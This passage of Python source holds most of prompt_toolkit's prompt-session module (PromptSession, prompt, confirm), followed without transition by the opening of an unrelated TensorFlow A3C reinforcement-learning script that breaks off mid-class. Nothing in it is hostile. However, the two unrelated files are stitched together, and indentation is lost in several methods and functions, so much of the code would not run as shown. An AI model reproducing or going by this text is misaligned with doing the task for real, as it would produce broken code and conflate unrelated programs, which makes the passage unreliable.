and the `PromptSession` (like `completer`, `style`, etcetera). There we have
the freedom to decide which settings we want for the whole 'session', and which
we want for an individual `prompt`.
Example::
# Simple `prompt` call.
result = prompt('Say something: ')
# Using a 'session'.
s = PromptSession()
result = s.prompt('Say something: ')
"""
from __future__ import unicode_literals
from prompt_toolkit.application import Application
from prompt_toolkit.application.current import get_app
from prompt_toolkit.auto_suggest import DynamicAutoSuggest
from prompt_toolkit.buffer import Buffer
from prompt_toolkit.clipboard import DynamicClipboard, InMemoryClipboard
from prompt_toolkit.completion import DynamicCompleter, ThreadedCompleter
from prompt_toolkit.document import Document
from prompt_toolkit.enums import DEFAULT_BUFFER, SEARCH_BUFFER, EditingMode
from prompt_toolkit.eventloop import ensure_future, Return, From
from prompt_toolkit.filters import is_done, has_focus, renderer_height_is_known, to_filter, Condition, has_arg
from prompt_toolkit.formatted_text import to_formatted_text, merge_formatted_text
from prompt_toolkit.history import InMemoryHistory
from prompt_toolkit.input.defaults import get_default_input
from prompt_toolkit.key_binding.bindings.auto_suggest import load_auto_suggest_bindings
from prompt_toolkit.key_binding.bindings.completion import display_completions_like_readline
from prompt_toolkit.key_binding.bindings.open_in_editor import load_open_in_editor_bindings
from prompt_toolkit.key_binding.key_bindings import KeyBindings, DynamicKeyBindings, merge_key_bindings, ConditionalKeyBindings, KeyBindingsBase
from prompt_toolkit.keys import Keys
from prompt_toolkit.layout import Window, HSplit, FloatContainer, Float
from prompt_toolkit.layout.containers import ConditionalContainer, WindowAlign
from prompt_toolkit.layout.controls import BufferControl, SearchBufferControl, FormattedTextControl
from prompt_toolkit.layout.dimension import Dimension
from prompt_toolkit.layout.layout import Layout
from prompt_toolkit.layout.margins import PromptMargin, ConditionalMargin
from prompt_toolkit.layout.menus import CompletionsMenu, MultiColumnCompletionsMenu
from prompt_toolkit.layout.processors import DynamicProcessor, PasswordProcessor, ConditionalProcessor, AppendAutoSuggestion, HighlightIncrementalSearchProcessor, HighlightSelectionProcessor, DisplayMultipleCursors, BeforeInput, ReverseSearchProcessor, ShowArg, merge_processors
from prompt_toolkit.layout.utils import explode_text_fragments
from prompt_toolkit.lexers import DynamicLexer
from prompt_toolkit.output.defaults import get_default_output
from prompt_toolkit.styles import BaseStyle, DynamicStyle
from prompt_toolkit.utils import suspend_to_background_supported
from prompt_toolkit.validation import DynamicValidator
from prompt_toolkit.widgets.toolbars import ValidationToolbar, SystemToolbar, SearchToolbar
from six import text_type
import contextlib
import threading
import time
# Public API of this module.
__all__ = [
    'PromptSession',
    'prompt',
    'confirm',
    'create_confirm_session', # Used by '_display_completions_like_readline'.
    'CompleteStyle',
]
def _split_multiline_prompt(get_prompt_text):
    """
    Split a prompt into the part above the input line and the part on it.

    Given a `get_prompt_text` callable, return three new callables: one
    that reports whether the prompt spans multiple lines; one producing
    the fragments shown on the lines above the input; and one producing
    the fragments for the first line of the input.
    """
    def has_before_fragments():
        # Any newline in the fragment text makes this a multiline prompt.
        return any('\n' in text for _style, text in get_prompt_text())

    def before():
        # Walk the single-character fragments backwards; everything before
        # the last newline belongs above the input line.
        fragments = []
        seen_newline = False
        for style, text in reversed(explode_text_fragments(get_prompt_text())):
            if seen_newline:
                fragments.insert(0, (style, text))
            elif text == '\n':
                seen_newline = True
        return fragments

    def first_input_line():
        # Collect the characters after the last newline, in order.
        fragments = []
        for style, text in reversed(explode_text_fragments(get_prompt_text())):
            if text == '\n':
                break
            fragments.insert(0, (style, text))
        return fragments

    return has_before_fragments, before, first_input_line
class _RPrompt(Window):
    " A `Window` that shows the prompt text aligned to the right side. "
    def __init__(self, get_formatted_text):
        control = FormattedTextControl(get_formatted_text)
        super(_RPrompt, self).__init__(
            control,
            style='class:rprompt',
            align=WindowAlign.RIGHT)
def _true(value):
    " Evaluate `value` as a boolean; a Filter is called to get its state. "
    as_filter = to_filter(value)
    return as_filter()
class CompleteStyle:
    " How to display autocompletions for the prompt. "
    # Completions shown in a single column.
    COLUMN = 'COLUMN'
    # Completions shown in multiple columns.
    MULTI_COLUMN = 'MULTI_COLUMN'
    # Completions displayed the way GNU Readline does it.
    READLINE_LIKE = 'READLINE_LIKE'
class PromptSession(object):
"""
PromptSession for a prompt application, which can be used as a GNU Readline
replacement.
This is a wrapper around a lot of ``prompt_toolkit`` functionality and can
be a replacement for `raw_input`.
All parameters that expect "formatted text" can take either just plain text
(a unicode object), a list of ``(style_str, text)`` tuples or an HTML object.
Example usage::
s = PromptSession(message='>')
text = s.prompt()
:param message: Plain text or formatted text to be shown before the prompt.
This can also be a callable that returns formatted text.
:param multiline: `bool` or :class:`~prompt_toolkit.filters.Filter`.
When True, prefer a layout that is more adapted for multiline input.
Text after newlines is automatically indented, and search/arg input is
shown below the input, instead of replacing the prompt.
:param wrap_lines: `bool` or :class:`~prompt_toolkit.filters.Filter`.
When True (the default), automatically wrap long lines instead of
scrolling horizontally.
:param is_password: Show asterisks instead of the actual typed characters.
:param editing_mode: ``EditingMode.VI`` or ``EditingMode.EMACS``.
    :param vi_mode: `bool`, if True, identical to ``editing_mode=EditingMode.VI``.
:param complete_while_typing: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Enable autocompletion while
typing.
:param validate_while_typing: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Enable input validation while
typing.
:param enable_history_search: `bool` or
        :class:`~prompt_toolkit.filters.Filter`. Enable up-arrow partial
        string matching.
:param search_ignore_case:
:class:`~prompt_toolkit.filters.Filter`. Search case insensitive.
:param lexer: :class:`~prompt_toolkit.lexers.Lexer` to be used for the
syntax highlighting.
:param validator: :class:`~prompt_toolkit.validation.Validator` instance
for input validation.
:param completer: :class:`~prompt_toolkit.completion.Completer` instance
for input completion.
:param complete_in_thread: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Run the completer code in a
background thread in order to avoid blocking the user interface.
For ``CompleteStyle.READLINE_LIKE``, this setting has no effect. There
we always run the completions in the main thread.
:param reserve_space_for_menu: Space to be reserved for displaying the menu.
(0 means that no space needs to be reserved.)
:param auto_suggest: :class:`~prompt_toolkit.auto_suggest.AutoSuggest`
instance for input suggestions.
:param style: :class:`.Style` instance for the color scheme.
:param include_default_pygments_style: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Tell whether the default
styling for Pygments lexers has to be included. By default, this is
true, but it is recommended to be disabled if another Pygments style is
passed as the `style` argument, otherwise, two Pygments styles will be
merged.
:param enable_system_prompt: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Pressing Meta+'!' will show
a system prompt.
:param enable_suspend: `bool` or :class:`~prompt_toolkit.filters.Filter`.
Enable Control-Z style suspension.
:param enable_open_in_editor: `bool` or
:class:`~prompt_toolkit.filters.Filter`. Pressing 'v' in Vi mode or
C-X C-E in emacs mode will open an external editor.
:param history: :class:`~prompt_toolkit.history.History` instance.
:param clipboard: :class:`~prompt_toolkit.clipboard.Clipboard` instance.
(e.g. :class:`~prompt_toolkit.clipboard.InMemoryClipboard`)
:param rprompt: Text or formatted text to be displayed on the right side.
This can also be a callable that returns (formatted) text.
:param bottom_toolbar: Formatted text or callable which is supposed to
return formatted text.
:param prompt_continuation: Text that needs to be displayed for a multiline
prompt continuation. This can either be formatted text or a callable
        that takes the width as input and returns formatted text.
:param complete_style: ``CompleteStyle.COLUMN``,
``CompleteStyle.MULTI_COLUMN`` or ``CompleteStyle.READLINE_LIKE``.
:param mouse_support: `bool` or :class:`~prompt_toolkit.filters.Filter`
to enable mouse support.
:param default: The default input text to be shown. (This can be edited by
the user).
:param refresh_interval: (number; in seconds) When given, refresh the UI
every so many seconds.
:param inputhook: None or an Inputhook callable that takes an
`InputHookContext` object.
"""
_fields = (
'message', 'lexer', 'completer', 'complete_in_thread', 'is_password',
'editing_mode', 'key_bindings', 'is_password', 'bottom_toolbar',
'style', 'color_depth', 'include_default_pygments_style', 'rprompt',
'multiline', 'prompt_continuation', 'wrap_lines',
'enable_history_search', 'search_ignore_case', 'complete_while_typing',
'validate_while_typing', 'complete_style', 'mouse_support',
'auto_suggest', 'clipboard', 'validator', 'refresh_interval',
'input_processors', 'default', 'enable_system_prompt',
'enable_suspend', 'enable_open_in_editor', 'reserve_space_for_menu',
'tempfile_suffix', 'inputhook')
    def __init__(
            self,
            message='',
            default='',
            multiline=False,
            wrap_lines=True,
            is_password=False,
            vi_mode=False,
            editing_mode=EditingMode.EMACS,
            complete_while_typing=True,
            validate_while_typing=True,
            enable_history_search=False,
            search_ignore_case=False,
            lexer=None,
            enable_system_prompt=False,
            enable_suspend=False,
            enable_open_in_editor=False,
            validator=None,
            completer=None,
            complete_in_thread=False,
            reserve_space_for_menu=8,
            complete_style=None,
            auto_suggest=None,
            style=None,
            color_depth=None,
            include_default_pygments_style=True,
            history=None,
            clipboard=None,
            prompt_continuation=None,
            rprompt=None,
            bottom_toolbar=None,
            mouse_support=False,
            input_processors=None,
            key_bindings=None,
            erase_when_done=False,
            tempfile_suffix='.txt',
            inputhook=None,
            refresh_interval=0,
            input=None,
            output=None):
        """
        Create the session and build its buffers, layout and `Application`.

        See the class docstring for the meaning of the parameters.
        """
        assert style is None or isinstance(style, BaseStyle)
        assert input_processors is None or isinstance(input_processors, list)
        assert key_bindings is None or isinstance(key_bindings, KeyBindingsBase)
        # Defaults.
        output = output or get_default_output()
        input = input or get_default_input()
        history = history or InMemoryHistory()
        clipboard = clipboard or InMemoryClipboard()
        # Ensure backwards-compatibility, when `vi_mode` is passed.
        if vi_mode:
            editing_mode = EditingMode.VI
        # Keep the I/O objects on the session.
        self.input = input
        self.output = output
        # Store the remaining settings on this instance.  The names in
        # `_fields` match the parameter names exactly, which is why
        # `locals()` can be used for the lookup — do not rename these
        # parameters without updating `_fields`.
        for name in self._fields:
            if name not in ('editing_mode', ):
                value = locals()[name]
                setattr(self, name, value)
        # Create buffers, layout and Application.
        self.history = history
        self.default_buffer = self._create_default_buffer()
        self.search_buffer = self._create_search_buffer()
        self.layout = self._create_layout()
        self.app = self._create_application(editing_mode, erase_when_done)
def _dyncond(self, attr_name):
"""
Dynamically take this setting from this 'PromptSession' class.
`attr_name` represents an attribute name of this class. Its value
can either be a boolean or a `Filter`.
This returns something that can be used as either a `Filter`
or `Filter`.
"""
@Condition
def dynamic():
value = getattr(self, attr_name)
return to_filter(value)()
return dynamic
    def _create_default_buffer(self):
        """
        Create and return the default input buffer.
        """
        dyncond = self._dyncond
        # Create buffers list.
        def accept(buff):
            """ Accept the content of the default buffer. This is called when
            the validation succeeds. """
            self.app.exit(result=buff.document.text)
            # Reset content before running again.
            self.app.pre_run_callables.append(buff.reset)
        # The lambdas below re-read the session attributes each time they
        # are evaluated, so per-call overrides of these settings take
        # effect without rebuilding the buffer.
        return Buffer(
            name=DEFAULT_BUFFER,
            # Make sure that complete_while_typing is disabled when
            # enable_history_search is enabled. (First convert to Filter,
            # to avoid doing bitwise operations on bool objects.)
            complete_while_typing=Condition(lambda:
                _true(self.complete_while_typing) and not
                _true(self.enable_history_search) and not
                self.complete_style == CompleteStyle.READLINE_LIKE),
            validate_while_typing=dyncond('validate_while_typing'),
            enable_history_search=dyncond('enable_history_search'),
            validator=DynamicValidator(lambda: self.validator),
            # Wrap the completer in a ThreadedCompleter only when
            # complete_in_thread is set and a completer exists.
            completer=DynamicCompleter(lambda:
                ThreadedCompleter(self.completer)
                if self.complete_in_thread and self.completer
                else self.completer),
            history=self.history,
            auto_suggest=DynamicAutoSuggest(lambda: self.auto_suggest),
            accept_handler=accept,
            tempfile_suffix=lambda: self.tempfile_suffix)
    def _create_search_buffer(self):
        """Create the `Buffer` used for incremental search input."""
        return Buffer(name=SEARCH_BUFFER)
    def _create_layout(self):
        """
        Create `Layout` for this prompt.

        The layout is: the (possibly multiline) prompt, the input buffer with
        floating completion menus and right-prompt on top, followed by the
        conditional toolbars (validation, system, arg, search, and the user
        supplied bottom toolbar).
        """
        dyncond = self._dyncond

        # Create functions that will dynamically split the prompt. (If we have
        # a multiline prompt.)
        has_before_fragments, get_prompt_text_1, get_prompt_text_2 = \
            _split_multiline_prompt(self._get_prompt)

        default_buffer = self.default_buffer
        search_buffer = self.search_buffer

        # Create processors list.
        all_input_processors = [
            HighlightIncrementalSearchProcessor(),
            HighlightSelectionProcessor(),
            ConditionalProcessor(AppendAutoSuggestion(),
                                 has_focus(default_buffer) & ~is_done),
            ConditionalProcessor(PasswordProcessor(), dyncond('is_password')),
            DisplayMultipleCursors(),

            # Users can insert processors here.
            DynamicProcessor(lambda: merge_processors(self.input_processors or [])),

            # For single line mode, show the prompt before the input.
            ConditionalProcessor(
                merge_processors([
                    BeforeInput(get_prompt_text_2),
                    ShowArg(),
                ]),
                ~dyncond('multiline'))
        ]

        # Create bottom toolbars.
        bottom_toolbar = ConditionalContainer(
            Window(FormattedTextControl(
                       lambda: self.bottom_toolbar,
                       style='class:bottom-toolbar.text'),
                   style='class:bottom-toolbar',
                   dont_extend_height=True,
                   height=Dimension(min=1)),
            filter=~is_done & renderer_height_is_known &
                   Condition(lambda: self.bottom_toolbar is not None))

        search_toolbar = SearchToolbar(
            search_buffer,
            ignore_case=dyncond('search_ignore_case'))

        search_buffer_control = SearchBufferControl(
            buffer=search_buffer,
            input_processors=[
                ReverseSearchProcessor(),
                ShowArg(),
            ],
            ignore_case=dyncond('search_ignore_case'))

        system_toolbar = SystemToolbar(
            enable_global_bindings=dyncond('enable_system_prompt'))

        def get_search_buffer_control():
            " Return the UIControl to be focused when searching start. "
            if _true(self.multiline):
                # Multiline mode: search happens in its own toolbar.
                return search_toolbar.control
            else:
                # Single-line mode: search replaces the input line.
                return search_buffer_control

        default_buffer_control = BufferControl(
            buffer=default_buffer,
            search_buffer_control=get_search_buffer_control,
            input_processors=all_input_processors,
            include_default_input_processors=False,
            lexer=DynamicLexer(lambda: self.lexer),
            preview_search=True)

        default_buffer_window = Window(
            default_buffer_control,
            height=self._get_default_buffer_control_height,
            left_margins=[
                # In multiline mode, use the window margin to display
                # the prompt and continuation fragments.
                ConditionalMargin(
                    PromptMargin(get_prompt_text_2, self._get_continuation),
                    filter=dyncond('multiline'),
                )
            ],
            wrap_lines=dyncond('wrap_lines'))

        @Condition
        def multi_column_complete_style():
            return self.complete_style == CompleteStyle.MULTI_COLUMN

        # Build the layout.
        layout = HSplit([
            # The main input, with completion menus floating on top of it.
            FloatContainer(
                HSplit([
                    ConditionalContainer(
                        Window(
                            FormattedTextControl(get_prompt_text_1),
                            dont_extend_height=True),
                        Condition(has_before_fragments)
                    ),
                    ConditionalContainer(
                        default_buffer_window,
                        Condition(lambda:
                            get_app().layout.current_control != search_buffer_control),
                    ),
                    ConditionalContainer(
                        Window(search_buffer_control),
                        Condition(lambda:
                            get_app().layout.current_control == search_buffer_control),
                    ),
                ]),
                [
                    # Completion menus.
                    Float(xcursor=True,
                          ycursor=True,
                          content=CompletionsMenu(
                              max_height=16,
                              scroll_offset=1,
                              extra_filter=has_focus(default_buffer) &
                                  ~multi_column_complete_style)),
                    Float(xcursor=True,
                          ycursor=True,
                          content=MultiColumnCompletionsMenu(
                              show_meta=True,
                              extra_filter=has_focus(default_buffer) &
                                  multi_column_complete_style)),
                    # The right prompt.
                    Float(right=0, top=0, hide_when_covering_content=True,
                          content=_RPrompt(lambda: self.rprompt)),
                ]
            ),
            ConditionalContainer(
                ValidationToolbar(),
                filter=~is_done),
            ConditionalContainer(
                system_toolbar,
                dyncond('enable_system_prompt') & ~is_done),

            # In multiline mode, we use two toolbars for 'arg' and 'search'.
            ConditionalContainer(
                Window(FormattedTextControl(self._get_arg_text), height=1),
                dyncond('multiline') & has_arg),
            ConditionalContainer(search_toolbar, dyncond('multiline') & ~is_done),
            bottom_toolbar,
        ])

        return Layout(layout, default_buffer_window)
    def _create_application(self, editing_mode, erase_when_done):
        """
        Create the `Application` object.

        :param editing_mode: `EditingMode` value to start the application in.
        :param erase_when_done: When True, erase the prompt UI after the input
            has been accepted.
        """
        dyncond = self._dyncond

        # Default key bindings.
        auto_suggest_bindings = load_auto_suggest_bindings()
        open_in_editor_bindings = load_open_in_editor_bindings()
        prompt_bindings = self._create_prompt_bindings()

        # Create application
        application = Application(
            layout=self.layout,
            style=DynamicStyle(lambda: self.style),
            include_default_pygments_style=dyncond('include_default_pygments_style'),
            clipboard=DynamicClipboard(lambda: self.clipboard),
            key_bindings=merge_key_bindings([
                merge_key_bindings([
                    auto_suggest_bindings,
                    ConditionalKeyBindings(open_in_editor_bindings,
                        dyncond('enable_open_in_editor') &
                        has_focus(DEFAULT_BUFFER)),
                    prompt_bindings
                ]),
                # User-supplied bindings, resolved dynamically at run time.
                DynamicKeyBindings(lambda: self.key_bindings),
            ]),
            mouse_support=dyncond('mouse_support'),
            editing_mode=editing_mode,
            erase_when_done=erase_when_done,
            reverse_vi_search_direction=True,
            color_depth=lambda: self.color_depth,

            # I/O.
            input=self.input,
            output=self.output)

        # During render time, make sure that we focus the right search control
        # (if we are searching). - This could be useful if people make the
        # 'multiline' property dynamic.
        # NOTE(review): intentionally disabled dead code, kept verbatim;
        # it references names that are not in scope here.
        '''
        def on_render(app):
            multiline = _true(self.multiline)
            current_control = app.layout.current_control

            if multiline:
                if current_control == search_buffer_control:
                    app.layout.current_control = search_toolbar.control
                    app.invalidate()
            else:
                if current_control == search_toolbar.control:
                    app.layout.current_control = search_buffer_control
                    app.invalidate()

        app.on_render += on_render
        '''

        return application
    def _create_prompt_bindings(self):
        """
        Create the KeyBindings for a prompt application.

        Covers: accept on Enter (single-line mode), readline-style Tab
        completion, Control-C abort, Control-D exit on empty buffer, and
        Control-Z suspend where the platform supports it.
        """
        kb = KeyBindings()
        handle = kb.add
        default_focused = has_focus(DEFAULT_BUFFER)

        @Condition
        def do_accept():
            # Enter only accepts in single-line mode; in multiline mode it
            # inserts a newline instead.
            return (not _true(self.multiline) and
                    self.app.layout.has_focus(DEFAULT_BUFFER))

        @handle('enter', filter=do_accept & default_focused)
        def _(event):
            " Accept input when enter has been pressed. "
            self.default_buffer.validate_and_handle()

        @Condition
        def readline_complete_style():
            return self.complete_style == CompleteStyle.READLINE_LIKE

        @handle('tab', filter=readline_complete_style & default_focused)
        def _(event):
            " Display completions (like Readline). "
            display_completions_like_readline(event)

        @handle('c-c', filter=default_focused)
        def _(event):
            " Abort when Control-C has been pressed. "
            event.app.exit(exception=KeyboardInterrupt, style='class:aborting')

        @Condition
        def ctrl_d_condition():
            """ Ctrl-D binding is only active when the default buffer is selected
            and empty. """
            app = get_app()
            return (app.current_buffer.name == DEFAULT_BUFFER and
                    not app.current_buffer.text)

        @handle('c-d', filter=ctrl_d_condition & default_focused)
        def _(event):
            " Exit when Control-D has been pressed. "
            event.app.exit(exception=EOFError, style='class:exiting')

        suspend_supported = Condition(suspend_to_background_supported)

        @Condition
        def enable_suspend():
            return to_filter(self.enable_suspend)()

        @handle('c-z', filter=suspend_supported & enable_suspend)
        def _(event):
            """
            Suspend process to background.
            """
            event.app.suspend_to_background()

        return kb
@contextlib.contextmanager
def _auto_refresh_context(self):
" Return a context manager for the auto-refresh loop. "
done = [False] # nonlocal
# Enter.
def run():
while not done[0]:
time.sleep(self.refresh_interval)
self.app.invalidate()
if self.refresh_interval:
t = threading.Thread(target=run)
t.daemon = True
t.start()
try:
yield
finally:
# Exit.
done[0] = True
    def prompt(
            self, message=None,
            # When any of these arguments are passed, this value is overwritten
            # for the current prompt.
            default='', editing_mode=None,
            refresh_interval=None, vi_mode=None, lexer=None, completer=None,
            complete_in_thread=None, is_password=None, key_bindings=None,
            bottom_toolbar=None, style=None, color_depth=None,
            include_default_pygments_style=None, rprompt=None, multiline=None,
            prompt_continuation=None, wrap_lines=None,
            enable_history_search=None, search_ignore_case=None,
            complete_while_typing=None, validate_while_typing=None,
            complete_style=None, auto_suggest=None, validator=None,
            clipboard=None, mouse_support=None, input_processors=None,
            reserve_space_for_menu=None, enable_system_prompt=None,
            enable_suspend=None, enable_open_in_editor=None,
            tempfile_suffix=None, inputhook=None,
            async_=False):
        """
        Display the prompt. All the arguments are a subset of the
        :class:`~.PromptSession` class itself.

        This will raise ``KeyboardInterrupt`` when control-c has been pressed
        (for abort) and ``EOFError`` when control-d has been pressed (for
        exit).

        :param async_: When `True` return a `Future` instead of waiting for the
            prompt to finish.
        """
        # Backup original settings.
        backup = dict((name, getattr(self, name)) for name in self._fields)

        # Take settings from 'prompt'-arguments.
        # NOTE: this looks parameters up by name via locals(), so the
        # parameter names above must match self._fields exactly.
        for name in self._fields:
            value = locals()[name]
            if value is not None:
                setattr(self, name, value)

        if vi_mode:
            self.editing_mode = EditingMode.VI

        def restore():
            " Restore original settings. "
            for name in self._fields:
                setattr(self, name, backup[name])

        def run_sync():
            # Settings are restored even when the prompt raises.
            with self._auto_refresh_context():
                try:
                    self.default_buffer.reset(Document(self.default))
                    return self.app.run(inputhook=self.inputhook)
                finally:
                    restore()

        def run_async():
            with self._auto_refresh_context():
                try:
                    self.default_buffer.reset(Document(self.default))
                    result = yield From(self.app.run_async())
                    raise Return(result)
                finally:
                    restore()

        if async_:
            return ensure_future(run_async())
        else:
            return run_sync()
    @property
    def editing_mode(self):
        # Proxy straight through to the underlying Application.
        return self.app.editing_mode

    @editing_mode.setter
    def editing_mode(self, value):
        self.app.editing_mode = value
def _get_default_buffer_control_height(self):
# If there is an autocompletion menu to be shown, make sure that our
# layout has at least a minimal height in order to display it.
if (self.completer is not None and
self.complete_style != CompleteStyle.READLINE_LIKE):
space = self.reserve_space_for_menu
else:
space = 0
if space and not get_app().is_done:
buff = self.default_buffer
# Reserve the space, either when there are completions, or when
# `complete_while_typing` is true and we expect completions very
# soon.
if buff.complete_while_typing() or buff.complete_state is not None:
return Dimension(min=space)
return Dimension()
def _get_prompt(self):
return to_formatted_text(self.message, style='class:prompt')
def _get_continuation(self, width, line_number, is_soft_wrap):
"""
Insert the prompt continuation.
:param width: The width that's available for the continuation (don't
exceed this).
:param line_number:
:param is_soft_wrap: True when we got a soft wrap here instead of a
hard line ending.
"""
prompt_continuation = self.prompt_continuation
if callable(prompt_continuation):
prompt_continuation = prompt_continuation(width, line_number, is_soft_wrap)
return to_formatted_text(
prompt_continuation, style='class:prompt-continuation')
def _get_arg_text(self):
arg = self.app.key_processor.arg
if arg == '-':
arg = '-1'
return [
('class:arg-toolbar', 'Repeat: '),
('class:arg-toolbar.text', arg)
]
def prompt(*a, **kw):
    """ The global `prompt` function. This will create a new `PromptSession`
    instance for every call. """
    # 'input' and 'output' belong to the PromptSession constructor rather
    # than to the prompt() method, so pop them out of the kwargs first.
    session_input = kw.pop('input', None)
    session_output = kw.pop('output', None)

    session = PromptSession(input=session_input, output=session_output)
    return session.prompt(*a, **kw)
prompt.__doc__ = PromptSession.prompt.__doc__
def create_confirm_session(message, suffix=' (y/n) '):
    """
    Create a `PromptSession` object for the 'confirm' function.

    'y'/'Y' exit with result True; 'n'/'N'/Control-C exit with result False;
    any other key is swallowed.
    """
    assert isinstance(message, text_type)
    bindings = KeyBindings()

    # NOTE: the handlers below close over `session`, which is only assigned
    # further down; they cannot run before the session exists.
    @bindings.add('y')
    @bindings.add('Y')
    def yes(event):
        session.default_buffer.text = 'y'
        event.app.exit(result=True)

    @bindings.add('n')
    @bindings.add('N')
    @bindings.add('c-c')
    def no(event):
        session.default_buffer.text = 'n'
        event.app.exit(result=False)

    @bindings.add(Keys.Any)
    def _(event):
        " Disallow inserting other text. "
        pass

    complete_message = merge_formatted_text([message, suffix])
    session = PromptSession(complete_message, key_bindings=bindings)
    return session
def confirm(message='Confirm?', suffix=' (y/n) '):
    """
    Display a confirmation prompt that returns True/False.
    """
    return create_confirm_session(message, suffix).prompt()
|
run_A3C.py | import threading
import multiprocessing
import numpy as np
import os
import random
#import matplotlib.pyplot as plt
import tensorflow as tf
import tensorflow.contrib.slim as slim
import scipy.signal
from scipy.misc import imresize
import gym
from gym import wrappers
from atari_wrappers import *
from dqn_utils import *
from random import choice
from time import sleep
from time import time
GLOBAL_STEP = 0
# Copies one set of variables to another.
# Used to set worker network parameters to those of global network.
def update_target_graph(from_scope, to_scope):
    """Return TF ops copying trainable variables between two scopes.

    Used to set worker network parameters to those of the global network.
    Variables are paired positionally, so both scopes must declare their
    variables in the same order.
    """
    from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope)
    to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope)
    return [dst.assign(src) for src, dst in zip(from_vars, to_vars)]
def process_frame(image):
    """Flatten a frame to 1-D and scale pixel values into [0, 1]."""
    flat = np.reshape(image, [np.prod(image.shape)])
    return flat / 255.0
'''
def process_frame(image, new_HW=(84, 84), height_range=(35, 193), bg=(144, 72, 17)):
"""Returns a preprocessed image
(1) Crop image (top and bottom)
(2) Remove background & grayscale
(3) Reszie to smaller image
Args:
image (3-D array): (H, W, C)
new_HW (tuple): New image size (height, width)
height_range (tuple): Height range (H_begin, H_end) else cropped
bg (tuple): Background RGB Color (R, G, B)
Returns:
image (3-D array): (H, W, 1)
"""
image = crop_image(image, height_range)
image = resize_image(image, new_HW)
image = kill_background_grayscale(image, bg)
image = np.expand_dims(image, axis=2)
image = np.reshape(image,[np.prod(image.shape)]) / 255.0
return image
def resize_image(image, new_HW):
"""Returns a resized image
Args:
image (3-D array): Numpy array (H, W, C)
new_HW (tuple): Target size (height, width)
Returns:
image (3-D array): Resized image (height, width, C)
"""
return imresize(image, new_HW, interp="nearest")
def crop_image(image, height_range=(35, 195)):
"""Crops top and bottom
Args:
image (3-D array): Numpy image (H, W, C)
height_range (tuple): Height range between (min_height, max_height)
will be kept
Returns:
image (3-D array): Numpy image (max_H - min_H, W, C)
"""
h_beg, h_end = height_range
return image[h_beg:h_end, ...]
def kill_background_grayscale(image, bg):
"""Make the background 0
Args:
image (3-D array): Numpy array (H, W, C)
bg (tuple): RGB code of background (R, G, B)
Returns:
image (2-D array): Binarized image of shape (H, W)
The background is 0 and everything else is 1
"""
H, W, _ = image.shape
R = image[..., 0]
G = image[..., 1]
B = image[..., 2]
cond = (R == bg[0]) & (G == bg[1]) & (B == bg[2])
image = np.zeros((H, W))
image[~cond] = 1
return image
'''
# Discounting function used to calculate discounted returns.
def discount(x, gamma):
return scipy.signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1]
#Used to initialize weights for policy and value output layers
def normalized_columns_initializer(std=1.0):
def _initializer(shape, dtype=None, partition_info=None):
out = np.random.randn(*shape).astype(np.float32)
out *= std / np.sqrt(np.square(out).sum(axis=0, keepdims=True))
return tf.constant(out)
return _initializer
class AC_Network():
    """Actor-Critic network for A3C.

    Conv layers -> LSTM -> softmax policy head + scalar value head, all built
    under `scope`.  Non-'global' scopes additionally get loss and gradient
    ops whose updates are applied to the 'global' network's variables.
    """
    def __init__(self,s_size,a_size,scope,trainer):
        with tf.variable_scope(scope):
            #Input and visual encoding layers
            # s_size is the flattened frame length; frames are reshaped
            # back to 84x84x1 greyscale images.
            self.inputs = tf.placeholder(shape=[None,s_size],dtype=tf.float32)
            self.imageIn = tf.reshape(self.inputs,shape=[-1,84,84,1])
            self.conv1 = slim.conv2d(activation_fn=tf.nn.elu,
                inputs=self.imageIn,num_outputs=16,
                kernel_size=[8,8],stride=[4,4],padding='VALID')
            self.conv2 = slim.conv2d(activation_fn=tf.nn.elu,
                inputs=self.conv1,num_outputs=32,
                kernel_size=[4,4],stride=[2,2],padding='VALID')
            hidden = slim.fully_connected(slim.flatten(self.conv2),256,activation_fn=tf.nn.elu)

            #Recurrent network for temporal dependencies
            lstm_cell = tf.contrib.rnn.BasicLSTMCell(256,state_is_tuple=True)
            c_init = np.zeros((1, lstm_cell.state_size.c), np.float32)
            h_init = np.zeros((1, lstm_cell.state_size.h), np.float32)
            self.state_init = [c_init, h_init]
            c_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.c])
            h_in = tf.placeholder(tf.float32, [1, lstm_cell.state_size.h])
            self.state_in = (c_in, h_in)
            rnn_in = tf.expand_dims(hidden, [0])
            # The whole batch is treated as a single time-sequence.
            step_size = tf.shape(self.imageIn)[:1]
            state_in = tf.contrib.rnn.LSTMStateTuple(c_in, h_in)
            lstm_outputs, lstm_state = tf.nn.dynamic_rnn(
                lstm_cell, rnn_in, initial_state=state_in, sequence_length=step_size,
                time_major=False)
            lstm_c, lstm_h = lstm_state
            self.state_out = (lstm_c[:1, :], lstm_h[:1, :])
            rnn_out = tf.reshape(lstm_outputs, [-1, 256])

            #Output layers for policy and value estimations
            self.policy = slim.fully_connected(rnn_out,a_size,
                activation_fn=tf.nn.softmax,
                weights_initializer=normalized_columns_initializer(0.01),
                biases_initializer=None)
            self.value = slim.fully_connected(rnn_out,1,
                activation_fn=None,
                weights_initializer=normalized_columns_initializer(1.0),
                biases_initializer=None)

            #Only the worker network need ops for loss functions and gradient updating.
            if scope != 'global':
                self.actions = tf.placeholder(shape=[None],dtype=tf.int32)
                self.actions_onehot = tf.one_hot(self.actions,a_size,dtype=tf.float32)
                self.target_v = tf.placeholder(shape=[None],dtype=tf.float32)
                self.advantages = tf.placeholder(shape=[None],dtype=tf.float32)

                # Probability the network assigned to the action taken.
                self.responsible_outputs = tf.reduce_sum(self.policy * self.actions_onehot, [1])

                #Loss functions
                self.value_loss = 0.5 * tf.reduce_sum(tf.square(self.target_v - tf.reshape(self.value,[-1])))
                self.entropy = - tf.reduce_sum(self.policy * tf.log(self.policy))
                self.policy_loss = -tf.reduce_sum(tf.log(self.responsible_outputs)*self.advantages)
                self.loss = 0.5 * self.value_loss + self.policy_loss - self.entropy * 0.01

                #Get gradients from local network using local losses
                local_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope)
                self.gradients = tf.gradients(self.loss,local_vars)
